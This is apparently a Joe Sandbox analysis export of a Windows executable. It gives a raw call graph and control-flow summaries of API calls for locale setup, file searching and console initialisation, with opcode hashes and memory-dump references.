19084->19083 19086 27451 19084->19086 19085->19081 19089 274d1 ??0exception@@QAE@ABQBDH 19086->19089 19088 277ec _CxxThrowException 19089->19088 19093 3345e 19090->19093 19096 332e4 19093->19096 19097 332f6 19096->19097 19104 32e74 19097->19104 19100 333a9 19102 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19100->19102 19103 333ba 19102->19103 19103->18772 19105 32ead 19104->19105 19106 32ea3 19104->19106 19108 32f1d GetCurrentThreadId 19105->19108 19106->19105 19107 3345e 9 API calls 19106->19107 19107->19105 19109 32f6c 19108->19109 19110 33061 19109->19110 19120 32e37 19109->19120 19113 33036 OutputDebugStringW 19115 32fe7 19113->19115 19115->19100 19116 3392b 19115->19116 19117 33941 19116->19117 19118 3394c memset 19116->19118 19117->19118 19119 3397a 19118->19119 19121 32e42 19120->19121 19122 32e4e 19120->19122 19121->19122 19123 32e5d IsDebuggerPresent 19121->19123 19122->19113 19122->19115 19124 32859 19122->19124 19123->19122 19125 32885 19124->19125 19134 32a23 19124->19134 19128 3290d FormatMessageW 19125->19128 19125->19134 19126 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19127 32a60 19126->19127 19127->19113 19129 32963 19128->19129 19130 3294c 19128->19130 19131 33067 _vsnwprintf 19129->19131 19153 33067 19130->19153 19133 3295e 19131->19133 19134->19126 19156 19a8d 19153->19156 19157 19a98 19156->19157 19161 1ec64 19160->19161 19163 18f0d 19160->19163 19162 1ec71 _wcsicmp 19161->19162 19161->19163 19164 1ec87 _wcsicmp 19162->19164 19173 1ed59 19162->19173 19163->18784 19163->18789 19165 1ec9d _wcsicmp 19164->19165 19167 1ed47 19164->19167 19165->19167 19168 1ecb3 _wcsicmp 19165->19168 19166 18e9e 436 API calls 19169 1ed6c 19166->19169 19210 19abf 19167->19210 19171 1ecc9 _wcsicmp 19168->19171 19172 2ddef GetCommandLineW 19168->19172 19214 16854 19169->19214 19171->19169 19174 1ecdf _wcsicmp 19171->19174 19172->19163 19173->19166 19175 1ecf1 _wcsicmp 19174->19175 19176 1ed24 19174->19176 19178 1ed07 _wcsicmp 
19175->19178 19179 2ddfa rand 19175->19179 19185 19310 19176->19185 19178->19163 19182 2de06 GetNumaHighestNodeNumber 19178->19182 19179->19167 19180 1ed30 19180->19163 19253 26c78 19180->19253 19182->19167 19186 1933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19185->19186 19187 2bbbc 19185->19187 19188 2bbd9 19186->19188 19189 1938d 19186->19189 19256 348d7 19187->19256 19205 2bbd1 19188->19205 19262 18791 GetUserDefaultLCID 19188->19262 19192 193cd 19189->19192 19193 2bbcc 19189->19193 19196 19abf _vsnwprintf 19192->19196 19194 19950 441 API calls 19193->19194 19194->19205 19198 193d6 19196->19198 19202 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19198->19202 19199 19abf _vsnwprintf 19199->19205 19200 2bc11 19206 2bd10 19200->19206 19209 2bcd0 memmove 19200->19209 19201 18791 GetUserDefaultLCID 19204 193fe 19202->19204 19204->19180 19205->19199 19208 2bdbf 19205->19208 19264 1998d 19205->19264 19206->19201 19209->19200 19211 19acd 19210->19211 19212 19aee 19211->19212 19300 19afb _vsnwprintf 19211->19300 19212->19173 19215 16b0c 19214->19215 19216 1688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19214->19216 19218 348d7 6 API calls 19215->19218 19217 168ec 19216->19217 19226 2a562 19216->19226 19220 18791 GetUserDefaultLCID 19217->19220 19219 2a4c2 19218->19219 19219->19180 19221 16906 GetLocaleInfoW 19220->19221 19238 16915 19221->19238 19222 2a5f9 19227 19abf _vsnwprintf 19222->19227 19223 2a5df realloc 19223->19222 19223->19226 19224 16966 19225 18791 GetUserDefaultLCID 19224->19225 19228 1698e GetDateFormatW 19225->19228 19226->19222 19226->19223 19232 178e4 434 API calls 19226->19232 19229 2a62a 19227->19229 19230 16a96 19228->19230 19231 1699d 19228->19231 19235 2a63e 19229->19235 19246 2a64d 19229->19246 19231->19230 19232->19226 19239 19950 434 API calls 19235->19239 19238->19224 19243 2a523 memmove 19238->19243 19244 16a75 memmove 19238->19244 19249 2a649 
19239->19249 19243->19238 19244->19238 19248 19950 434 API calls 19246->19248 19248->19249 19302 26b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19253->19302 19255 1ed88 19255->19172 19257 348f0 GetSystemTime 19256->19257 19258 348fc 19256->19258 19259 3493b SystemTimeToFileTime 19257->19259 19258->19259 19260 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19259->19260 19261 2bbc7 19260->19261 19261->19180 19263 187a5 GetLocaleInfoW 19262->19263 19263->19200 19265 199a0 19264->19265 19287 199d0 19264->19287 19266 19a11 6 API calls 19265->19266 19267 199a8 19266->19267 19287->19205 19301 19b1f 19300->19301 19301->19212 19302->19255 19304 1a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19303->19304 19306 1a986 19303->19306 19305 1a9d4 5 API calls 19304->19305 19307 1a9c5 19305->19307 19306->19304 19307->18803 20253 1a8e6 20252->20253 20254 1cc70 549 API calls 20253->20254 20255 1a8f8 20254->20255 20256 280ba longjmp 20255->20256 20257 1a90c 20255->20257 20258 280c8 20256->20258 20298 1bab0 20257->20298 20311 1d660 EnterCriticalSection LeaveCriticalSection 20258->20311 20261 1a911 20261->18617 20262 280cd 20262->18617 20264 1cc7a 20263->20264 20265 1cf10 548 API calls 20264->20265 20266 1cc8a 20265->20266 20267 2d434 longjmp 20266->20267 20268 1cc9b 20266->20268 20267->20268 20269 19950 448 API calls 20268->20269 20270 1ccc4 20268->20270 20271 2d45b 20269->20271 20270->18622 20273 38996 20272->20273 20274 3898e 20272->20274 20275 389a2 20273->20275 20277 389b2 20273->20277 20278 389db 20274->20278 20279 389ce longjmp 20274->20279 20276 178e4 448 API calls 20275->20276 20276->20274 20277->20274 20280 178e4 448 API calls 20277->20280 20278->18616 20279->20278 20280->20274 20282 387a0 20281->20282 20283 38900 20282->20283 20284 38930 20282->20284 20286 388be 20282->20286 20288 19950 448 API calls 20282->20288 20295 3892e 20282->20295 20296 388d2 20282->20296 20297 38791 448 API calls 20282->20297 20285 
19950 448 API calls 20283->20285 20287 19950 448 API calls 20284->20287 20290 3890f 20285->20290 20286->20283 20293 388c3 20286->20293 20287->20295 20288->20282 20291 19950 448 API calls 20290->20291 20294 38925 20290->20294 20291->20294 20293->20284 20293->20296 20869 3871d 20294->20869 20295->18621 20876 386e6 20296->20876 20297->20282 20302 1bb19 20298->20302 20310 1bac2 20298->20310 20299 1baf3 20304 1bb56 20299->20304 20396 1ccd0 20299->20396 20300 1badc _wcsicmp 20300->20299 20303 1bb68 20300->20303 20306 1cc70 549 API calls 20302->20306 20308 1bb48 20302->20308 20302->20310 20303->20299 20307 1cc70 549 API calls 20303->20307 20304->20261 20305 1bb15 20305->20261 20306->20302 20307->20303 20308->20304 20309 1cc70 549 API calls 20308->20309 20309->20310 20310->20299 20310->20300 20313 1d6b0 20311->20313 20312 2d587 20315 2d59b 20312->20315 20318 163bd 448 API calls 20312->20318 20313->20312 20314 1d6c6 EnterCriticalSection LeaveCriticalSection 20313->20314 20322 1d971 20313->20322 20316 1d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20314->20316 20317 2d5a8 20314->20317 20712 3769e 20315->20712 20321 1d752 20316->20321 20745 39fcf _get_osfhandle GetFileType 20317->20745 20318->20315 20327 2d742 memcmp 20321->20327 20334 1d774 20321->20334 20347 1d81c 20321->20347 20322->20322 20690 1da30 20322->20690 20324 2d5be 20326 1dd98 6 API calls 20324->20326 20344 2d6bd 20324->20344 20325 1d980 20325->20262 20332 2d5cd 20326->20332 20327->20334 20328 2d6c6 _get_osfhandle 20331 345f9 10 API calls 20328->20331 20329 1d9f7 GetLastError 20339 1d82c 20329->20339 20330 1d7b2 20337 2d7e9 20330->20337 20338 1d7ec MultiByteToWideChar 20330->20338 20343 1d809 20330->20343 20331->20344 20333 2d5de 20332->20333 20332->20344 20333->20316 20340 1dd98 6 API calls 20333->20340 20334->20330 20335 2d78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20334->20335 20341 1d7bd SetFilePointer 20334->20341 20335->20330 20335->20343 20336 2d6ef 
GetLastError 20336->20321 20336->20344 20346 2d7f0 EnterCriticalSection LeaveCriticalSection longjmp 20337->20346 20338->20343 20350 1dd98 6 API calls 20339->20350 20366 1d840 20339->20366 20345 2d5f2 20340->20345 20341->20330 20343->20346 20343->20347 20344->20321 20344->20328 20344->20336 20344->20339 20348 2d6b3 20345->20348 20351 2d607 20345->20351 20346->20339 20347->20329 20347->20339 20348->20316 20349 1d893 20349->20262 20352 2d826 20350->20352 20353 2d610 20351->20353 20354 2d61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20351->20354 20358 39922 448 API calls 20352->20358 20352->20366 20746 37613 _get_osfhandle 20353->20746 20356 34191 448 API calls 20354->20356 20357 2d665 20356->20357 20357->20329 20359 2d66d 20357->20359 20360 2d84f longjmp 20358->20360 20359->20339 20361 2d677 GetLastError 20359->20361 20360->20366 20364 2d689 20361->20364 20365 2d69e 20361->20365 20362 1d8d7 wcschr 20363 1d8f6 20362->20363 20362->20366 20370 1d9e3 20363->20370 20372 1d904 20363->20372 20367 19950 448 API calls 20364->20367 20368 19950 448 API calls 20365->20368 20366->20349 20366->20362 20366->20363 20371 2d68e longjmp 20367->20371 20368->20339 20369 2d908 20369->20262 20370->20322 20377 1d9eb 20370->20377 20371->20365 20372->20369 20374 1dd98 6 API calls 20372->20374 20373 2d8d3 20375 178e4 448 API calls 20373->20375 20378 1d945 20374->20378 20379 2d8df 20375->20379 20376 2d8af 20381 178e4 448 API calls 20376->20381 20377->20373 20377->20376 20380 3769e 459 API calls 20377->20380 20378->20322 20382 1d949 _get_osfhandle SetFilePointer 20378->20382 20383 2d8fb longjmp 20379->20383 20387 1dd98 6 API calls 20379->20387 20384 2d898 20380->20384 20385 2d8be 20381->20385 20382->20322 20393 2d915 20382->20393 20383->20369 20388 19950 448 API calls 20384->20388 20386 39922 448 API calls 20385->20386 20389 2d8c6 longjmp 20386->20389 20390 2d8f2 20387->20390 20391 2d8a2 20388->20391 20389->20373 20390->20383 20751 3a0da 20390->20751 20392 19950 448 API calls 
20391->20392 20392->20376 20393->20322 20394 1998d 448 API calls 20393->20394 20394->20322 20397 1cd14 20396->20397 20398 1cce9 20396->20398 20439 1de30 20397->20439 20400 1ccf5 20398->20400 20401 1cde8 20398->20401 20403 1cd01 20400->20403 20404 1cdf2 20400->20404 20510 1e090 20401->20510 20405 1cd12 20403->20405 20436 1e230 20403->20436 20513 1e210 20404->20513 20406 1cddd 20405->20406 20455 1cf10 _setjmp3 20405->20455 20406->20305 20410 1cd48 20411 1cd59 20410->20411 20412 2d478 longjmp 20410->20412 20413 2d48f 20411->20413 20418 1cd85 20411->20418 20412->20413 20414 19950 448 API calls 20413->20414 20415 2d49f 20414->20415 20416 39922 448 API calls 20415->20416 20419 2d4ac longjmp 20416->20419 20417 1ce4a 20423 1cc70 549 API calls 20417->20423 20428 1ce61 20417->20428 20432 1ce6c 20417->20432 20418->20417 20420 1cdd2 20418->20420 20421 2d4ba 20419->20421 20422 1cf10 548 API calls 20420->20422 20424 19950 448 API calls 20421->20424 20422->20406 20423->20417 20425 2d4ca 20424->20425 20425->20305 20426 1dcd0 448 API calls 20427 1ce89 20426->20427 20427->20415 20429 1ce93 20427->20429 20430 1cf10 548 API calls 20428->20430 20431 1cc70 549 API calls 20429->20431 20430->20432 20433 1ceac 20431->20433 20432->20406 20432->20426 20434 1bab0 575 API calls 20433->20434 20435 1cec6 20433->20435 20434->20435 20435->20305 20437 1ccd0 577 API calls 20436->20437 20438 1e247 20437->20438 20438->20405 20516 1ded0 20439->20516 20441 1de4a 20442 1de52 20441->20442 20443 2da16 20441->20443 20534 1e0b0 20442->20534 20445 1cc70 549 API calls 20443->20445 20448 1de57 20445->20448 20446 1de64 20447 1cc70 549 API calls 20446->20447 20453 1de92 20446->20453 20449 1de75 20447->20449 20448->20446 20451 38959 449 API calls 20448->20451 20450 1ded0 555 API calls 20449->20450 20452 1de80 20450->20452 20451->20446 20452->20453 20454 1cf10 548 API calls 20452->20454 20453->20405 20454->20453 20456 2d56e 20455->20456 20460 1cf38 20455->20460 20457 1d03b 20458 1d048 20457->20458 20461 19950 448 
API calls 20457->20461 20458->20410 20459 1cf9e 20463 1d600 533 API calls 20459->20463 20460->20456 20460->20457 20460->20459 20468 1cf86 wcschr 20460->20468 20504 1d0fa 20460->20504 20685 1d600 20460->20685 20462 2d4ca 20461->20462 20462->20410 20465 1cfb7 20463->20465 20467 2d4d2 20465->20467 20470 1cfc7 20465->20470 20466 1cf67 iswspace 20466->20460 20469 1d600 533 API calls 20467->20469 20467->20504 20468->20459 20468->20460 20471 2d4ea 20469->20471 20472 1cfe2 iswdigit 20470->20472 20475 1d0a6 20470->20475 20480 1d4a7 20470->20480 20470->20504 20481 1d600 533 API calls 20471->20481 20474 1cfff 20472->20474 20477 1d341 20472->20477 20473 1d600 533 API calls 20473->20504 20483 1d600 533 API calls 20474->20483 20492 1d027 20474->20492 20475->20477 20484 1d0b5 iswspace 20475->20484 20485 1d0e8 iswdigit 20475->20485 20476 1d218 20476->20410 20477->20472 20478 1d600 533 API calls 20477->20478 20477->20504 20478->20477 20479 1d190 20479->20476 20482 178e4 448 API calls 20479->20482 20486 1d600 533 API calls 20480->20486 20481->20477 20482->20456 20491 1d2a5 20483->20491 20484->20472 20487 1d0c7 20484->20487 20488 1d310 20485->20488 20485->20504 20493 1d4ac 20486->20493 20490 1d0d0 wcschr 20487->20490 20487->20504 20488->20477 20489 1d328 iswspace 20488->20489 20489->20477 20495 1d484 20489->20495 20490->20472 20490->20485 20494 1d600 533 API calls 20491->20494 20499 1d2ae 20491->20499 20492->20410 20493->20457 20493->20471 20493->20472 20493->20504 20494->20499 20498 1a62f wcschr 20495->20498 20496 1d1b4 iswspace 20496->20479 20496->20504 20497 1d16d iswdigit 20497->20504 20498->20477 20499->20492 20501 1d600 533 API calls 20499->20501 20506 1a62f wcschr 20499->20506 20507 1d426 iswdigit 20499->20507 20500 1d23e iswspace 20503 1d253 wcschr 20500->20503 20500->20504 20505 1d405 iswspace 20501->20505 20502 1d1d1 wcschr 20502->20479 20502->20497 20503->20504 20504->20473 20504->20474 20504->20479 20504->20496 20504->20497 20504->20500 20504->20502 20505->20499 
20506->20499 20507->20492 20508 1d438 20507->20508 20509 1d600 533 API calls 20508->20509 20509->20492 20511 1ccd0 577 API calls 20510->20511 20512 1e0a7 20511->20512 20512->20405 20514 1ccd0 577 API calls 20513->20514 20515 1e227 20514->20515 20515->20405 20520 1df00 20516->20520 20517 1dcd0 448 API calls 20517->20520 20518 1df16 iswdigit 20519 1df27 20518->20519 20518->20520 20523 1df2f 20519->20523 20524 1cf10 548 API calls 20519->20524 20520->20517 20520->20518 20520->20519 20521 1df63 iswdigit 20520->20521 20522 2daf9 longjmp 20520->20522 20525 1e26b 20520->20525 20526 2daec 20520->20526 20530 1e059 iswdigit 20520->20530 20531 38959 449 API calls 20520->20531 20532 1acb0 448 API calls 20520->20532 20533 1cc70 549 API calls 20520->20533 20608 1a931 20520->20608 20521->20520 20522->20525 20523->20441 20524->20523 20525->20441 20527 38959 449 API calls 20526->20527 20528 2daf1 20527->20528 20528->20522 20530->20520 20531->20520 20532->20520 20533->20520 20535 1e0c1 _wcsicmp 20534->20535 20536 1e15b 20534->20536 20537 1e203 _wcsicmp 20535->20537 20538 1e0dc _wcsicmp 20535->20538 20539 1e1db 20536->20539 20542 1dcd0 448 API calls 20536->20542 20545 22a35 20537->20545 20599 22a63 20537->20599 20538->20537 20540 1e0f7 _wcsicmp 20538->20540 20543 38959 449 API calls 20539->20543 20566 1e1e0 20539->20566 20540->20536 20544 1e112 _wcsicmp 20540->20544 20546 1e17d 20542->20546 20547 1e1f5 20543->20547 20544->20536 20548 1e12d _wcsicmp 20544->20548 20627 1bb90 20545->20627 20550 29ca7 20546->20550 20560 1e187 20546->20560 20547->20448 20548->20536 20552 1e144 _wcsicmp 20548->20552 20551 39922 448 API calls 20550->20551 20555 29cac longjmp 20551->20555 20552->20536 20553 22a47 20559 1cc70 549 API calls 20553->20559 20553->20599 20554 1e1bf 20558 1a8c4 563 API calls 20554->20558 20557 15e22 20555->20557 20556 1cc70 549 API calls 20556->20560 20561 29cc3 20557->20561 20565 15da6 448 API calls 20557->20565 20562 1e1c9 20558->20562 20563 22a5b 20559->20563 20560->20554 
20560->20556 20564 1e1b4 20560->20564 20561->20448 20562->20566 20570 1cc70 549 API calls 20562->20570 20644 19907 20563->20644 20568 1cf10 548 API calls 20564->20568 20569 15e31 20565->20569 20566->20448 20568->20554 20571 18f21 448 API calls 20569->20571 20570->20539 20572 15e3a 20571->20572 20578 15e1d 20572->20578 20587 38c50 448 API calls 20572->20587 20573 22ae4 20576 2f500 20573->20576 20577 22af4 iswspace 20573->20577 20574 22a7c _wcsicmp 20575 22a92 _wcsicmp 20574->20575 20574->20599 20579 22aa8 _wcsicmp 20575->20579 20575->20599 20580 38959 449 API calls 20576->20580 20577->20576 20581 22b0b 20577->20581 20578->20448 20582 22abe _wcsicmp 20579->20582 20579->20599 20583 22b81 20580->20583 20586 1a62f wcschr 20581->20586 20595 22ad7 20582->20595 20582->20599 20590 38959 449 API calls 20583->20590 20607 22b8c 20583->20607 20584 1dcd0 448 API calls 20584->20599 20585 1cc70 549 API calls 20585->20599 20588 22b1f 20586->20588 20596 15e68 20587->20596 20588->20576 20592 22b34 20588->20592 20589 2f4d2 20591 39922 448 API calls 20589->20591 20593 2f50f 20590->20593 20594 2f4d7 longjmp 20591->20594 20651 22c23 20592->20651 20593->20593 20594->20595 20595->20573 20601 38959 449 API calls 20595->20601 20596->20448 20598 38959 449 API calls 20598->20599 20599->20573 20599->20574 20599->20584 20599->20585 20599->20589 20599->20598 20600 22b4b 20655 233ca 20600->20655 20601->20573 20607->20448 20609 1cc70 549 API calls 20608->20609 20610 1a93b 20609->20610 20611 1a942 20610->20611 20612 38959 449 API calls 20610->20612 20613 1dcd0 448 API calls 20611->20613 20614 1a94f 20611->20614 20612->20611 20613->20614 20615 1a959 20614->20615 20616 39922 448 API calls 20614->20616 20615->20520 20617 29cac longjmp 20616->20617 20618 15e22 20617->20618 20619 29cc3 20618->20619 20620 15da6 448 API calls 20618->20620 20619->20520 20621 15e31 20620->20621 20622 18f21 448 API calls 20621->20622 20623 15e3a 20622->20623 20624 15e1d 20623->20624 20625 38c50 448 API calls 20623->20625 
20624->20520 20626 15e68 20625->20626 20626->20520 20628 1dcd0 448 API calls 20627->20628 20629 1bba1 20628->20629 20631 1dcd0 448 API calls 20629->20631 20635 1bbc1 20629->20635 20630 39922 448 API calls 20632 29cac longjmp 20630->20632 20631->20635 20633 15e22 20632->20633 20634 29cc3 20633->20634 20636 15da6 448 API calls 20633->20636 20634->20553 20635->20630 20637 1bbde 20635->20637 20638 15e31 20636->20638 20637->20553 20639 18f21 448 API calls 20638->20639 20640 15e3a 20639->20640 20641 15e1d 20640->20641 20642 38c50 448 API calls 20640->20642 20641->20553 20643 15e68 20642->20643 20643->20553 20645 1bc30 448 API calls 20644->20645 20646 19938 20645->20646 20675 1a800 20646->20675 20649 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20650 1994e 20649->20650 20650->20599 20652 1cc70 549 API calls 20651->20652 20653 22c2f _wcsicmp 20652->20653 20654 22c41 20653->20654 20654->20600 20656 1cc70 549 API calls 20655->20656 20657 233e2 20656->20657 20658 2f776 20657->20658 20666 233eb 20657->20666 20659 38959 449 API calls 20658->20659 20660 2f77b 20659->20660 20661 1cc70 549 API calls 20661->20666 20662 23457 20666->20660 20666->20661 20666->20662 20667 1dd20 448 API calls 20666->20667 20668 1dcd0 448 API calls 20666->20668 20669 2f78c 20666->20669 20667->20666 20668->20666 20676 19943 20675->20676 20677 1a82f 20675->20677 20676->20649 20677->20676 20678 39a0e 449 API calls 20677->20678 20679 2c971 20678->20679 20679->20676 20680 163bd 448 API calls 20679->20680 20682 2c982 20680->20682 20682->20676 20686 1d613 20685->20686 20687 1d660 533 API calls 20686->20687 20689 1d627 20686->20689 20688 280cd 20687->20688 20688->20466 20689->20466 20691 1dcd0 448 API calls 20690->20691 20692 1da45 20691->20692 20693 2d948 memset longjmp 20692->20693 20707 1da52 20692->20707 20694 1da81 20693->20694 20694->20325 20695 1dad3 20696 1daf1 20695->20696 20697 2d9ad 20695->20697 20698 1dc60 2 API calls 20696->20698 20700 178e4 448 API calls 20697->20700 20699 1daf6 
20698->20699 20699->20325 20701 2d9a8 20700->20701 20704 1dc60 2 API calls 20701->20704 20705 2d9cc longjmp 20704->20705 20706 2d9da 20705->20706 20708 178e4 448 API calls 20706->20708 20707->20694 20707->20695 20707->20697 20710 2d97b memcpy 20707->20710 20759 1ee03 20707->20759 20810 1bf70 20707->20810 20709 2d9e3 20708->20709 20709->20325 20711 178e4 448 API calls 20710->20711 20711->20701 20713 37728 20712->20713 20714 376fd 20712->20714 20716 37d26 20713->20716 20719 37746 20713->20719 20721 19950 448 API calls 20713->20721 20715 163bd 448 API calls 20714->20715 20718 37708 EnterCriticalSection LeaveCriticalSection 20715->20718 20717 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20716->20717 20720 37d3d 20717->20720 20718->20713 20722 1ec2e 448 API calls 20719->20722 20723 37750 20719->20723 20720->20317 20721->20719 20722->20723 20724 18e9e 448 API calls 20723->20724 20725 377ad 20724->20725 20864 37654 20725->20864 20728 37c99 20729 19abf _vsnwprintf 20728->20729 20730 37cba 20729->20730 20732 1998d 448 API calls 20730->20732 20731 378b8 towupper 20741 377fa 20731->20741 20733 37cfe 20732->20733 20733->20716 20734 37d07 EnterCriticalSection LeaveCriticalSection 20733->20734 20734->20716 20735 19310 448 API calls 20735->20741 20736 16854 448 API calls 20736->20741 20737 19abf _vsnwprintf 20737->20741 20738 14d08 5 API calls 20738->20741 20739 37afc GetDriveTypeW 20739->20741 20741->20730 20741->20731 20741->20735 20741->20736 20741->20737 20741->20738 20741->20739 20742 19abf _vsnwprintf 20741->20742 20743 272ef ApiSetQueryApiSetPresence 20741->20743 20868 2640a FormatMessageW 20741->20868 20744 379ed LocalFree 20742->20744 20743->20741 20744->20741 20745->20324 20747 34799 448 API calls 20746->20747 20748 3763c 20747->20748 20749 37649 GetLastError 20748->20749 20750 37645 20748->20750 20749->20750 20750->20339 20752 3a0ef GetStdHandle 20751->20752 20753 34799 448 API calls 20752->20753 20754 3a110 20753->20754 20755 3a114 wcschr 20754->20755 
25598->25604 25599->25607 25606 178e4 448 API calls 25600->25606 25601->25544 25602->25607 25605 365ea 25604->25605 25605->25599 25606->25607 25607->25592 25607->25601 25609 19950 448 API calls 25608->25609 25609->25607 25611 1dc60 2 API calls 25610->25611 25612 357a0 25611->25612 25613 1dc60 2 API calls 25612->25613 25614 35775 RegCloseKey 25613->25614 25614->25536

Control-flow Graph

[Control-flow graph figure; legend: Executed, Not Executed]
APIs
  • Part of subcall function 00018791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00016906,0000001F,?,00000080), ref: 00018791
• GetLocaleInfoW.KERNELBASE(00000000,0000001E,0004C9E0,00000008), ref: 0001859E
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000185BC
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00018614
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00018653
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0004C9D0,00000008), ref: 0001867D
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0004C970,00000020), ref: 00018698
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0004C930,00000020), ref: 000186B0
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0004C8F0,00000020), ref: 000186C8
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0004C8B0,00000020), ref: 000186E0
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0004C870,00000020), ref: 000186F8
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0004C830,00000020), ref: 00018710
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0004C7F0,00000020), ref: 00018728
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0004C9C0,00000008), ref: 00018743
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0004C9B0,00000008), ref: 0001875B
• setlocale.MSVCRT ref: 00018770
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042
• Opcode ID: 3846ac712209e5cf350f9fd01572f9728111bbb8c988323823da3d88505067d6
• Instruction ID: b293c6a42e162ffac73954808c4aac93d82f32d05cf0b118b3367436f901cd32
• Opcode Fuzzy Hash: 3846ac712209e5cf350f9fd01572f9728111bbb8c988323823da3d88505067d6
• Instruction Fuzzy Hash: EFC1D37170022296EB709F35ED48BBB37ECAF51754F244229E946DA185EF78CA81C360

Control-flow Graph

[Control-flow graph figure; legend: Executed, Not Executed]
APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00020297
• FindClose.KERNELBASE(00000000), ref: 000202B0
• memcpy.MSVCRT(?,?,?), ref: 00020311
• _wcsnicmp.MSVCRT ref: 00020367
• _wcsicmp.MSVCRT ref: 0002E746
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 242869866-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 171a18aad7d75bc888f47a4fd79dc22f927a50912ef0745b669d15953ea4f972
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75715ce3754400f2662a5c3ae274e3f2c605ab3813428a1cf37929237525602a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 171a18aad7d75bc888f47a4fd79dc22f927a50912ef0745b669d15953ea4f972
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5851A3756083618BC724DF68EC485AFB7E9EFC8310F15461EE889C3291E731D949CB96

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 187ca-18870 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 1e310 call 1a9d4 call 18b96 call 18273 GetCommandLineW 9 18873-1887c 0->9 9->9 10 1887e-1888a 9->10 11 18890-1889f call 21a05 10->11 12 18b37-18b38 10->12 18 188a5-188db GetCommandLineW call 1f3a0 call 1e3f0 11->18 19 18b2f-18b35 11->19 14 18b3d-18b43 call 178e4 12->14 20 18b44-18b4c call 27d18 14->20 18->19 27 188e1-188e9 18->27 19->14 28 188f0-18903 call 18e9e call 200e9 27->28 29 188eb 27->29 34 18906-1890f 28->34 29->28 34->34 35 18911-18930 call 1a24c 34->35 38 18932 35->38 39 18934-1893d 35->39 38->39 40 189ab-189e1 GetConsoleOutputCP GetCPInfo call 18572 GetProcessHeap HeapAlloc 39->40 41 1893f-18943 